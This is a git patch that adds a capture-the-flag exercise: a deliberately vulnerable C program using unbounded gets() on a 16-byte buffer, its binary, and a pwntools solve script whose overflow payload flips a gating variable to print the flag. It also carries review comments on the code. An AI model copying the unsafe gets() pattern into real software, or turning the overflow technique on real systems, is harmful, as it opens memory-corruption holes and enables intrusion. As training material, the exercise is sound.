From 7350f4e9579936105b2854fa4a9e8cb076cbb948 Mon Sep 17 00:00:00 2001
From: h7x4
Date: Tue, 3 Sep 2024 20:31:41 +0200
Subject: [PATCH] pwn/local_target
---
pwn/local_target/local-target | Bin 0 -> 17088 bytes
pwn/local_target/local-target.c | 50 ++++++++++++++++++++++++++++++++
pwn/local_target/solve.py | 31 ++++++++++++++++++++
3 files changed, 81 insertions(+)
create mode 100755 pwn/local_target/local-target
create mode 100644 pwn/local_target/local-target.c
create mode 100755 pwn/local_target/solve.py
diff --git a/pwn/local_target/local-target b/pwn/local_target/local-target new file mode 100755 index 0000000000000000000000000000000000000000..072f668627d6dc758c65b4364fda0415c25b8d46 GIT binary patch literal 17088 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 literal 0 HcmV?d00001 diff --git a/pwn/local_target/local-target.c b/pwn/local_target/local-target.c new file mode 100644 index 0000000..f20ecdd --- /dev/null +++ b/pwn/local_target/local-target.c @@ -0,0 +1,50 @@ +#include +#include + + + +int main(){ + FILE *fptr; + char c; + + char input[16]; + int num = 64; + + printf("Enter a string: "); + fflush(stdout); + gets(input); + printf("\n"); + + printf("num is %d\n", num); + fflush(stdout); + + if( num == 65 ){ + printf("You win!\n"); + fflush(stdout); + // Open file + fptr = fopen("flag.txt", "r"); + if (fptr == NULL) + { + printf("Cannot open file.\n"); + fflush(stdout); + exit(0); + } + + // Read contents from file + c = fgetc(fptr); + while (c != EOF) + { + printf ("%c", c); + c = fgetc(fptr); + } + fflush(stdout); + + printf("\n"); + fflush(stdout); + fclose(fptr); + exit(0); + } + + printf("Bye!\n"); + fflush(stdout); +} 
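Review bot: `gets(input)` in `main()` reads a line of any length into the 16-byte `input` array, so longer input overruns the buffer and can alter the neighbouring `num`, the only value gating the `flag.txt` read. The directory name and the solve script in the same commit suggest this is a deliberate training target, so rather than changing the call I would add a header comment such as `/* Deliberately vulnerable CTF target: unbounded gets(); do not reuse. Safe form: fgets(input, sizeof input, stdin). */`. It would also help to record the compiler flags used for the committed binary next to it, because hardening options change the stack layout that the observed behaviour depends on. Separately, `char c` holds the result of `fgetc()` and is compared with `EOF`; declaring it `int c;` avoids mistaking a 0xFF byte for end of file, or never matching `EOF` where `char` is unsigned. The two `#include` lines show no header names on this page, which is probably an extraction artefact but worth checking in the real file.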
diff --git a/pwn/local_target/solve.py b/pwn/local_target/solve.py
new file mode 100755
index 0000000..8a32702
--- /dev/null
+++ b/pwn/local_target/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./local-target")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 58138".split()
+
+def conn():
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def main():
+ r = conn()
+
+ r.recvuntil(b"Enter a string: ")
+ offset = 24 # found with pwndbg
+ payload = b'A' * offset + p64(65)
+ r.sendline(payload)
+ print(r.recvall())
+ r.close()
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
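Review bot: `print(r.recvall())` in `main()` blocks until the peer closes the connection, and `r.close()` is skipped if anything before it raises. Opening the session as `with conn() as r:` and bounding the read, for example `r.recvall(timeout=5)`, would keep the script from hanging on a stalled instance and would always release the tube. The endpoint string `"saturn.picoctf.net 58138"` looks like a per-instance challenge address and will probably go stale, so a comment saying so (or reading it from the command line) would spare the next reader a confusing connection error. `from pwn import *` also hides where `args`, `ELF`, `remote`, `process` and `p64` come from, and the file ends without a trailing newline.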